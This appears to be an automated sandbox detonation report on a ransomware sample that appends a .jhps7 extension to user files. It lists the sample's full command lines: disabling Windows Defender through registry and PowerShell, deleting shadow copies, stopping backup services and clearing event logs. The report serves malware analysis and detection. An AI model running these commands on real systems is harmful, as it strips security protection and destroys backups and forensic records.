| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe
"C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe"
C:\Windows\SysWOW64\net.exe
net.exe stop "SamSs" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "vmicvss" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "vmicvss" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "VSS" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "wbengine" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "WebClient" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "UnistoreSvc_13561" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "UnistoreSvc_13561" /y
C:\Windows\SysWOW64\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "vmicvss" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "UnistoreSvc_13561" start= disabled
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl system
C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl security
C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl application
C:\Windows\SysWOW64\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\SysWOW64\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | time.windows.com | udp |
| NL | 20.101.57.9:123 | time.windows.com | udp |
Files
memory/1292-115-0x0000000000000000-mapping.dmp
memory/3484-116-0x0000000000000000-mapping.dmp
memory/1248-117-0x0000000000000000-mapping.dmp
memory/2548-118-0x0000000000000000-mapping.dmp
memory/3700-119-0x0000000000000000-mapping.dmp
memory/2500-120-0x0000000000000000-mapping.dmp
memory/3652-121-0x0000000000000000-mapping.dmp
memory/3268-122-0x0000000000000000-mapping.dmp
memory/2688-123-0x0000000000000000-mapping.dmp
memory/2112-124-0x0000000000000000-mapping.dmp
memory/328-125-0x0000000000000000-mapping.dmp
memory/1788-126-0x0000000000000000-mapping.dmp
memory/3328-127-0x0000000000000000-mapping.dmp
memory/3872-128-0x0000000000000000-mapping.dmp
memory/3676-129-0x0000000000000000-mapping.dmp
memory/956-130-0x0000000000000000-mapping.dmp
memory/60-131-0x0000000000000000-mapping.dmp
memory/1300-132-0x0000000000000000-mapping.dmp
memory/948-133-0x0000000000000000-mapping.dmp
memory/2380-134-0x0000000000000000-mapping.dmp
memory/2356-135-0x0000000000000000-mapping.dmp
memory/1848-136-0x0000000000000000-mapping.dmp
memory/4048-137-0x0000000000000000-mapping.dmp
memory/1772-138-0x0000000000000000-mapping.dmp
memory/3128-139-0x0000000000000000-mapping.dmp
memory/3004-140-0x0000000000000000-mapping.dmp
memory/1324-141-0x0000000000000000-mapping.dmp
memory/1524-142-0x0000000000000000-mapping.dmp
memory/1384-143-0x0000000000000000-mapping.dmp
memory/2132-144-0x0000000000000000-mapping.dmp
memory/3196-145-0x0000000000000000-mapping.dmp
memory/2676-146-0x0000000000000000-mapping.dmp
memory/1680-147-0x0000000000000000-mapping.dmp
memory/2860-148-0x0000000000000000-mapping.dmp
memory/2884-149-0x0000000000000000-mapping.dmp
memory/2668-150-0x0000000000000000-mapping.dmp
memory/2548-151-0x0000000000000000-mapping.dmp
memory/1548-152-0x0000000000000000-mapping.dmp
memory/2500-153-0x0000000000000000-mapping.dmp
memory/600-154-0x0000000000000000-mapping.dmp
memory/2112-155-0x0000000000000000-mapping.dmp
memory/3040-156-0x0000000000000000-mapping.dmp
memory/2864-157-0x0000000000000000-mapping.dmp
memory/364-158-0x0000000000000000-mapping.dmp
memory/684-159-0x0000000000000000-mapping.dmp
memory/1992-160-0x0000000000000000-mapping.dmp
memory/332-161-0x0000000000000000-mapping.dmp
memory/2556-162-0x0000000000000000-mapping.dmp
memory/3952-163-0x0000000000000000-mapping.dmp
memory/2120-164-0x0000000000000000-mapping.dmp
memory/2224-165-0x0000000000000000-mapping.dmp
memory/3132-166-0x0000000000000000-mapping.dmp
memory/3124-167-0x0000000000000000-mapping.dmp
memory/1520-168-0x0000000000000000-mapping.dmp
memory/2276-169-0x0000000000000000-mapping.dmp
memory/3536-170-0x0000000000000000-mapping.dmp
memory/3204-171-0x0000000000000000-mapping.dmp
memory/4020-172-0x0000000000000000-mapping.dmp
memory/3824-173-0x0000000000000000-mapping.dmp
memory/952-174-0x0000000000000000-mapping.dmp
memory/3512-175-0x0000000000000000-mapping.dmp
memory/3496-176-0x0000000000000000-mapping.dmp
memory/528-177-0x0000000000000000-mapping.dmp
memory/3616-178-0x0000000000000000-mapping.dmp
memory/1764-180-0x00000000008F0000-0x00000000008F1000-memory.dmp
memory/1764-179-0x00000000008F0000-0x00000000008F1000-memory.dmp
memory/1764-181-0x0000000000C30000-0x0000000000C31000-memory.dmp
memory/1764-182-0x0000000004290000-0x00000000042C6000-memory.dmp
memory/1764-183-0x0000000000C32000-0x0000000000C33000-memory.dmp
memory/1764-184-0x0000000006D50000-0x0000000007378000-memory.dmp
memory/1764-185-0x0000000006930000-0x0000000006952000-memory.dmp
memory/1764-186-0x00000000073F0000-0x0000000007456000-memory.dmp
memory/1764-187-0x0000000007560000-0x00000000075C6000-memory.dmp
memory/1764-188-0x0000000007700000-0x0000000007A50000-memory.dmp
memory/1764-189-0x00000000075F0000-0x000000000760C000-memory.dmp
memory/1764-190-0x0000000007610000-0x000000000765B000-memory.dmp
memory/1764-191-0x0000000007D80000-0x0000000007DF6000-memory.dmp
memory/1764-192-0x00000000008F0000-0x00000000008F1000-memory.dmp
memory/1764-200-0x0000000006D50000-0x0000000007378000-memory.dmp
memory/1764-201-0x000000007E950000-0x000000007E951000-memory.dmp
memory/1764-202-0x0000000008BB0000-0x0000000008BE3000-memory.dmp
memory/1764-203-0x0000000008BB0000-0x0000000008BE3000-memory.dmp
memory/1764-204-0x0000000006930000-0x0000000006952000-memory.dmp
memory/1764-205-0x00000000073F0000-0x0000000007456000-memory.dmp
memory/1764-206-0x0000000007560000-0x00000000075C6000-memory.dmp
memory/1764-207-0x0000000007610000-0x000000000765B000-memory.dmp
memory/1764-208-0x0000000007D80000-0x0000000007DF6000-memory.dmp
memory/1764-209-0x0000000008AF0000-0x0000000008B0E000-memory.dmp
memory/1764-214-0x0000000008E10000-0x0000000008EB5000-memory.dmp
memory/1764-215-0x0000000000C33000-0x0000000000C34000-memory.dmp
memory/1764-216-0x0000000009190000-0x0000000009224000-memory.dmp
memory/1764-409-0x0000000009090000-0x00000000090AA000-memory.dmp
memory/1764-414-0x0000000009090000-0x00000000090AA000-memory.dmp
memory/1764-415-0x0000000009080000-0x0000000009088000-memory.dmp
memory/1764-420-0x0000000009080000-0x0000000009088000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 1c19c16e21c97ed42d5beabc93391fc5 |
| SHA1 | 8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68 |
| SHA256 | 1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05 |
| SHA512 | 7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c |
memory/3388-433-0x0000000004140000-0x0000000004176000-memory.dmp
memory/3388-434-0x0000000006D30000-0x0000000007358000-memory.dmp
memory/3388-435-0x00000000066F0000-0x00000000066F1000-memory.dmp
memory/3388-436-0x00000000066F2000-0x00000000066F3000-memory.dmp
memory/3388-437-0x0000000006AE0000-0x0000000006B02000-memory.dmp
memory/3388-439-0x0000000007420000-0x0000000007486000-memory.dmp
memory/3388-438-0x0000000006B80000-0x0000000006BE6000-memory.dmp
memory/3388-440-0x0000000007490000-0x00000000077E0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 46213c672e82f1f8c20669652a1606a5 |
| SHA1 | b0c123a57ae84b56a8559c4c964066274e2d1ad4 |
| SHA256 | 7d8e1c5b27262d3330fd6535755326519e523f27946933e7352d9c681a3b3d71 |
| SHA512 | c58884ac19a9069d93916bb4fea48579d6ce653822b5ab1fb5ca146747bd4707600886d9febe2a810e3699aca3e8ecf9184f340f6ca6f6461329c551d1ef6b45 |
memory/3388-442-0x00000000078F0000-0x000000000790C000-memory.dmp
memory/3388-443-0x0000000007C40000-0x0000000007C8B000-memory.dmp
memory/3388-444-0x0000000007CA0000-0x0000000007D16000-memory.dmp
memory/3388-453-0x0000000006D30000-0x0000000007358000-memory.dmp
memory/3388-455-0x0000000008AD0000-0x0000000008B03000-memory.dmp
memory/3388-459-0x0000000007C40000-0x0000000007C8B000-memory.dmp
memory/3388-460-0x0000000007CA0000-0x0000000007D16000-memory.dmp
memory/3388-458-0x0000000007420000-0x0000000007486000-memory.dmp
memory/3388-457-0x0000000006B80000-0x0000000006BE6000-memory.dmp
memory/3388-456-0x0000000006AE0000-0x0000000006B02000-memory.dmp
memory/3388-454-0x0000000008AD0000-0x0000000008B03000-memory.dmp
memory/3388-461-0x0000000008AB0000-0x0000000008ACE000-memory.dmp
memory/3388-466-0x0000000008EC0000-0x0000000008F65000-memory.dmp
memory/3388-467-0x0000000009010000-0x00000000090A4000-memory.dmp
memory/3388-483-0x000000007F850000-0x000000007F851000-memory.dmp
memory/3388-485-0x00000000066F3000-0x00000000066F4000-memory.dmp
memory/3388-667-0x0000000008F90000-0x0000000008FAA000-memory.dmp
memory/3388-662-0x0000000008F90000-0x0000000008FAA000-memory.dmp
memory/3388-668-0x0000000008F80000-0x0000000008F88000-memory.dmp
memory/3388-673-0x0000000008F80000-0x0000000008F88000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2022-01-12 19:26
Reported
2022-01-12 19:31
Platform
win7-en-20211208
Max time kernel
163s
Max time network
126s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Hive
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" | C:\Windows\SysWOW64\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Modifies extensions of user files
| Description | Indicator | Process | Target |
| File renamed | C:\Users\Admin\Pictures\BackupResolve.png => C:\Users\Admin\Pictures\BackupResolve.png.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_y2N5f24_dPY0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\InstallConvertTo.raw => C:\Users\Admin\Pictures\InstallConvertTo.raw.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_7hzro7Q_Jgc0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\JoinDeny.crw.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_fHsSQzf8TFE0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\PushRemove.tiff => C:\Users\Admin\Pictures\PushRemove.tiff.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_LVhpq22wIcI0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\WatchSet.tiff => C:\Users\Admin\Pictures\WatchSet.tiff.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_e9ChL9xkWJw0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\WatchSet.tiff.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_e9ChL9xkWJw0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\JoinDeny.crw => C:\Users\Admin\Pictures\JoinDeny.crw.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_fHsSQzf8TFE0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\MeasureStep.raw.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_AvZhcYsoiGc0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\ResolveExit.tiff => C:\Users\Admin\Pictures\ResolveExit.tiff.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_kUGuFCNodDQ0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\ResolveExit.tiff.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_kUGuFCNodDQ0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\UnlockCheckpoint.tiff.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_oiyuzWfHDQ00.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\CompleteRestart.tiff.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_xHtzVD_jhqw0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\MeasureStep.raw => C:\Users\Admin\Pictures\MeasureStep.raw.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_AvZhcYsoiGc0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\PushRemove.tiff.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_LVhpq22wIcI0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\UnlockCheckpoint.tiff => C:\Users\Admin\Pictures\UnlockCheckpoint.tiff.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_oiyuzWfHDQ00.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\StopSet.tiff.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_aRZbXqUHaHk0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\BackupResolve.png.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_y2N5f24_dPY0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\CompleteRestart.tiff => C:\Users\Admin\Pictures\CompleteRestart.tiff.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_xHtzVD_jhqw0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\InstallConvertTo.raw.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_7hzro7Q_Jgc0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\StopSet.tiff => C:\Users\Admin\Pictures\StopSet.tiff.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_aRZbXqUHaHk0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
Reads user/profile data of web browsers
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\7-Zip\7z.sfx.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_6U2TucaWhHQ0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_sv.properties.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_xH0qJspj4Fo0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\rt.jar.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_slAnsTm2zaY0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_IE19xpdflrg0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsViewAttachmentIcons.jpg.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_KvGxR9Ny_tE0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SKY\SKY.INF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_50S4_2GKpi40.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02743G.GIF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_ietfb4yDpf40.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
